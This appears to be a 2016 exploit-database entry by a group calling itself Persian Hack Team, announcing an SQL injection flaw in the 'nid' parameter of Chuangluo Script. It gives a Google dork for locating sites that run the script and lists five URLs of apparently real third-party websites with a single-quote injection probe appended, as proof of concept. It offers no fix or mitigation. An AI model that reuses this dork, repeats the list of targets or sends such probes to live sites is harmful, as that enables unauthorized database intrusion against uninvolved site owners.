######################
# Exploit Title : Chuangluo Script SQL Injection vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.chuangluo.com/
# Google Dork : " Powered by: Chuangluo.com" nid=
# Date: 2016/02/22
#
######################
# PoC:
# nid=[SQL]
#
# http://www.twmuhua.com/en/news_list.php?nid=1%27
# http://www.bestwon-ledlight.com/news.php?nid=2%27
# http://www.ruxandq.com/en/news_list.php?nid=2%27
# http://www.hwsjdz.com/en/news.php?nid=8%27
# http://en.woweld.com/news_list.php?nid=2%27
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################